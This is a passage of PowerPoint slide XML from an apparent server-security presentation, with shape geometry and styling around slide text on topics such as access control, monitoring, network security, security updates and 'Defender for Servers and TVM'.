          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660977" y="1499497"/>
            <a:ext cx="4653922" cy="4074456"/>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900" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>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24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Hardware and encryption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24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RBAC and Managing Access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24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Monitoring and logging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24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Network Security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24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Configuration Management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24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Antivirus/Malware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24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Security Updates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24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Run Scripts and Extensions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2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="80000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Defender for Servers and TVM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24123481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92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E960DCA8-A2FC-48B3-AE5A-B42062258896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4791284" y="2507841"/>
            <a:ext cx="2517883" cy="3616876"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 206 w 400"/>
              <a:gd name="T1" fmla="*/ 577 h 577"/>
              <a:gd name="T2" fmla="*/ 206 w 400"/>
              <a:gd name="T3" fmla="*/ 577 h 577"/>
              <a:gd name="T4" fmla="*/ 279 w 400"/>
              <a:gd name="T5" fmla="*/ 471 h 577"/>
              <a:gd name="T6" fmla="*/ 278 w 400"/>
              <a:gd name="T7" fmla="*/ 471 h 577"/>
              <a:gd name="T8" fmla="*/ 306 w 400"/>
              <a:gd name="T9" fmla="*/ 430 h 577"/>
              <a:gd name="T10" fmla="*/ 400 w 400"/>
              <a:gd name="T11" fmla="*/ 200 h 577"/>
              <a:gd name="T12" fmla="*/ 200 w 400"/>
              <a:gd name="T13" fmla="*/ 0 h 577"/>
              <a:gd name="T14" fmla="*/ 0 w 400"/>
              <a:gd name="T15" fmla="*/ 200 h 577"/>
              <a:gd name="T16" fmla="*/ 94 w 400"/>
              <a:gd name="T17" fmla="*/ 430 h 577"/>
              <a:gd name="T18" fmla="*/ 122 w 400"/>
              <a:gd name="T19" fmla="*/ 471 h 577"/>
              <a:gd name="T20" fmla="*/ 121 w 400"/>
              <a:gd name="T21" fmla="*/ 471 h 577"/>
              <a:gd name="T22" fmla="*/ 279 w 400"/>
              <a:gd name="T23" fmla="*/ 498 h 577"/>
              <a:gd name="T24" fmla="*/ 279 w 400"/>
              <a:gd name="T25" fmla="*/ 498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577">
                <a:moveTo>
                  <a:pt x="206" y="577"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="206" y="577"/>
                  <a:pt x="206" y="577"/>
                  <a:pt x="206" y="577"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="279" y="471"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="278" y="471"/>
                  <a:pt x="278" y="471"/>
                  <a:pt x="278" y="471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="297" y="464"/>
                  <a:pt x="306" y="451"/>
                  <a:pt x="306" y="430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="306" y="350"/>
                  <a:pt x="400" y="298"/>
                  <a:pt x="400" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="400" y="31"/>
                  <a:pt x="258" y="0"/>
                  <a:pt x="200" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="0"/>
                  <a:pt x="0" y="31"/>
                  <a:pt x="0" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="298"/>
                  <a:pt x="94" y="350"/>
                  <a:pt x="94" y="430"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="94" y="451"/>
                  <a:pt x="103" y="464"/>
                  <a:pt x="122" y="471"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="471"/>
                  <a:pt x="121" y="471"/>
                  <a:pt x="121" y="471"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="279" y="498"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="279" y="498"/>
                  <a:pt x="279" y="498"/>
                  <a:pt x="279" y="498"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>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Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 249">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72E64D76-28F9-4E23-83F8-07442B57DC04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4898484" y="2626512"/>
            <a:ext cx="2303482" cy="3319200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1803727 w 3607454"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 5200882"/>
              <a:gd name="connsiteX1" fmla="*/ 3607454 w 3607454"/>
              <a:gd name="connsiteY1" fmla="*/ 1809002 h 5200882"/>
              <a:gd name="connsiteX2" fmla="*/ 2759801 w 3607454"/>
              <a:gd name="connsiteY2" fmla="*/ 3873625 h 5200882"/>
              <a:gd name="connsiteX3" fmla="*/ 2503534 w 3607454"/>
              <a:gd name="connsiteY3" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX4" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY4" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX5" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY5" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX6" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY6" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX7" fmla="*/ 2611955 w 3607454"/>
              <a:gd name="connsiteY7" fmla="*/ 4365202 h 5200882"/>
              <a:gd name="connsiteX8" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY8" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX9" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY9" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX10" fmla="*/ 2513390 w 3607454"/>
              <a:gd name="connsiteY10" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX11" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY11" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX12" fmla="*/ 2611955 w 3607454"/>
              <a:gd name="connsiteY12" fmla="*/ 4581496 h 5200882"/>
              <a:gd name="connsiteX13" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY13" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX14" fmla="*/ 2503534 w 3607454"/>
              <a:gd name="connsiteY14" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX15" fmla="*/ 2503534 w 3607454"/>
              <a:gd name="connsiteY15" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX16" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY16" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX17" fmla="*/ 2611955 w 3607454"/>
              <a:gd name="connsiteY17" fmla="*/ 4797789 h 5200882"/>
              <a:gd name="connsiteX18" fmla="*/ 2523247 w 3607454"/>
              <a:gd name="connsiteY18" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX19" fmla="*/ 2434539 w 3607454"/>
              <a:gd name="connsiteY19" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX20" fmla="*/ 1862866 w 3607454"/>
              <a:gd name="connsiteY20" fmla="*/ 5200882 h 5200882"/>
              <a:gd name="connsiteX21" fmla="*/ 1754445 w 3607454"/>
              <a:gd name="connsiteY21" fmla="*/ 5200882 h 5200882"/>
              <a:gd name="connsiteX22" fmla="*/ 1172916 w 3607454"/>
              <a:gd name="connsiteY22" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX23" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY23" fmla="*/ 4896105 h 5200882"/>
              <a:gd name="connsiteX24" fmla="*/ 995500 w 3607454"/>
              <a:gd name="connsiteY24" fmla="*/ 4797789 h 5200882"/>
              <a:gd name="connsiteX25" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY25" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX26" fmla="*/ 1103921 w 3607454"/>
              <a:gd name="connsiteY26" fmla="*/ 4699474 h 5200882"/>
              <a:gd name="connsiteX27" fmla="*/ 1103921 w 3607454"/>
              <a:gd name="connsiteY27" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX28" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY28" fmla="*/ 4679811 h 5200882"/>
              <a:gd name="connsiteX29" fmla="*/ 995500 w 3607454"/>
              <a:gd name="connsiteY29" fmla="*/ 4581496 h 5200882"/>
              <a:gd name="connsiteX30" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY30" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX31" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY31" fmla="*/ 4483180 h 5200882"/>
              <a:gd name="connsiteX32" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY32" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX33" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY33" fmla="*/ 4463517 h 5200882"/>
              <a:gd name="connsiteX34" fmla="*/ 995500 w 3607454"/>
              <a:gd name="connsiteY34" fmla="*/ 4365202 h 5200882"/>
              <a:gd name="connsiteX35" fmla="*/ 1084208 w 3607454"/>
              <a:gd name="connsiteY35" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX36" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY36" fmla="*/ 4266886 h 5200882"/>
              <a:gd name="connsiteX37" fmla="*/ 1094064 w 3607454"/>
              <a:gd name="connsiteY37" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX38" fmla="*/ 1103921 w 3607454"/>
              <a:gd name="connsiteY38" fmla="*/ 4247223 h 5200882"/>
              <a:gd name="connsiteX39" fmla="*/ 847653 w 3607454"/>
              <a:gd name="connsiteY39" fmla="*/ 3873625 h 5200882"/>
              <a:gd name="connsiteX40" fmla="*/ 0 w 3607454"/>
              <a:gd name="connsiteY40" fmla="*/ 1809002 h 5200882"/>
              <a:gd name="connsiteX41" fmla="*/ 1803727 w 3607454"/>
              <a:gd name="connsiteY41" fmla="*/ 0 h 5200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607454" h="5200882">
                <a:moveTo>
                  <a:pt x="1803727" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2335974" y="0"/>
                  <a:pt x="3607454" y="285115"/>
                  <a:pt x="3607454" y="1809002"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3607454" y="2684009"/>
                  <a:pt x="2759801" y="3155923"/>
                  <a:pt x="2759801" y="3873625"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2759801" y="4070256"/>
                  <a:pt x="2680949" y="4178402"/>
                  <a:pt x="2503534" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2503534" y="4247223"/>
                  <a:pt x="2503534" y="4247223"/>
                  <a:pt x="2513390" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4247223"/>
                  <a:pt x="2513390" y="4247223"/>
                  <a:pt x="2513390" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4266886"/>
                  <a:pt x="2513390" y="4266886"/>
                  <a:pt x="2523247" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2572529" y="4266886"/>
                  <a:pt x="2611955" y="4316044"/>
                  <a:pt x="2611955" y="4365202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2611955" y="4424191"/>
                  <a:pt x="2572529" y="4463517"/>
                  <a:pt x="2523247" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2523247" y="4463517"/>
                  <a:pt x="2523247" y="4463517"/>
                  <a:pt x="2513390" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4463517"/>
                  <a:pt x="2513390" y="4463517"/>
                  <a:pt x="2513390" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2513390" y="4483180"/>
                  <a:pt x="2513390" y="4483180"/>
                  <a:pt x="2523247" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2572529" y="4483180"/>
                  <a:pt x="2611955" y="4532338"/>
                  <a:pt x="2611955" y="4581496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2611955" y="4640485"/>
                  <a:pt x="2572529" y="4679811"/>
                  <a:pt x="2523247" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2523247" y="4679811"/>
                  <a:pt x="2523247" y="4679811"/>
                  <a:pt x="2503534" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2503534" y="4689642"/>
                  <a:pt x="2503534" y="4699474"/>
                  <a:pt x="2503534" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2503534" y="4699474"/>
                  <a:pt x="2503534" y="4699474"/>
                  <a:pt x="2523247" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2572529" y="4699474"/>
                  <a:pt x="2611955" y="4748632"/>
                  <a:pt x="2611955" y="4797789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2611955" y="4846947"/>
                  <a:pt x="2572529" y="4896105"/>
                  <a:pt x="2523247" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2523247" y="4896105"/>
                  <a:pt x="2523247" y="4896105"/>
                  <a:pt x="2434539" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2326118" y="5073072"/>
                  <a:pt x="2109277" y="5200882"/>
                  <a:pt x="1862866" y="5200882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1862866" y="5200882"/>
                  <a:pt x="1862866" y="5200882"/>
                  <a:pt x="1754445" y="5200882"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1498178" y="5200882"/>
                  <a:pt x="1291193" y="5073072"/>
                  <a:pt x="1172916" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1172916" y="4896105"/>
                  <a:pt x="1172916" y="4896105"/>
                  <a:pt x="1084208" y="4896105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1034926" y="4896105"/>
                  <a:pt x="995500" y="4846947"/>
                  <a:pt x="995500" y="4797789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="995500" y="4748632"/>
                  <a:pt x="1034926" y="4699474"/>
                  <a:pt x="1084208" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1084208" y="4699474"/>
                  <a:pt x="1084208" y="4699474"/>
                  <a:pt x="1103921" y="4699474"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1103921" y="4699474"/>
                  <a:pt x="1103921" y="4689642"/>
                  <a:pt x="1103921" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1103921" y="4679811"/>
                  <a:pt x="1103921" y="4679811"/>
                  <a:pt x="1084208" y="4679811"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1034926" y="4679811"/>
                  <a:pt x="995500" y="4640485"/>
                  <a:pt x="995500" y="4581496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="995500" y="4532338"/>
                  <a:pt x="1034926" y="4483180"/>
                  <a:pt x="1084208" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1084208" y="4483180"/>
                  <a:pt x="1084208" y="4483180"/>
                  <a:pt x="1094064" y="4483180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4483180"/>
                  <a:pt x="1094064" y="4483180"/>
                  <a:pt x="1094064" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4463517"/>
                  <a:pt x="1094064" y="4463517"/>
                  <a:pt x="1084208" y="4463517"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1034926" y="4463517"/>
                  <a:pt x="995500" y="4424191"/>
                  <a:pt x="995500" y="4365202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="995500" y="4316044"/>
                  <a:pt x="1034926" y="4266886"/>
                  <a:pt x="1084208" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1084208" y="4266886"/>
                  <a:pt x="1084208" y="4266886"/>
                  <a:pt x="1094064" y="4266886"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4266886"/>
                  <a:pt x="1094064" y="4266886"/>
                  <a:pt x="1094064" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1094064" y="4247223"/>
                  <a:pt x="1094064" y="4247223"/>
                  <a:pt x="1103921" y="4247223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="926505" y="4178402"/>
                  <a:pt x="847653" y="4070256"/>
                  <a:pt x="847653" y="3873625"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="847653" y="3155923"/>
                  <a:pt x="0" y="2684009"/>
                  <a:pt x="0" y="1809002"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="285115"/>
                  <a:pt x="1281336" y="0"/>
                  <a:pt x="1803727" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="288000" tIns="180000" rIns="288000" bIns="1080000" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" kern="1200" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1000" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="198000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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
                <a:srgbClr val="494949"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="nb-NO" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Over 18 000 criticital vulnerabilities reported in 2021</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Tahoma"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D9BEB54-5336-45DC-9EDA-B35018181D4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="959538" y="1545755"/>
            <a:ext cx="2340000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200" cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1100" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="538163" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="198000" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
